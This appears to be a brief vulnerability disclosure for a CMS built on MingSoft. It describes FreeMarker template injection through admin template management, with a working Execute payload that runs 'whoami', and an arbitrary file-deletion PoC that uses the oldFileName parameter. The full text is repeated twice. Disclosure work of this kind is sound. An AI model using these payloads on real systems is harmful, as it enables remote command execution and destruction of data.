SSTI
FreeMarker template is used in the project,and there is no secure configuration
Insert the payload in the background - > system settings - > template management
<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}
net/mingsoft/basic/action/TemplateAction.java There's a suffix check, it's written to the file
net/mingsoft/basic/util/BasicUtil.java GetRealTemplatePath of this class is called
coverage /target/classes/WEB-INF/manager/main.ftl ,Refresh the home page
Delete any file
If the oldFileName argument exists, the corresponding file is deleted
Call the FileUtil.class
poc:
fileName=x&oldFileName=file destination
SSTI
FreeMarker template is used in the project,and there is no secure configuration
Insert the payload in the background - > system settings - > template management
<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}
net/mingsoft/basic/action/TemplateAction.java There's a suffix check, it's written to the file
net/mingsoft/basic/util/BasicUtil.java GetRealTemplatePath of this class is called
coverage /target/classes/WEB-INF/manager/main.ftl ,Refresh the home page
Delete any file
If the oldFileName argument exists, the corresponding file is deleted
Call the FileUtil.class
poc:
fileName=x&oldFileName=file destination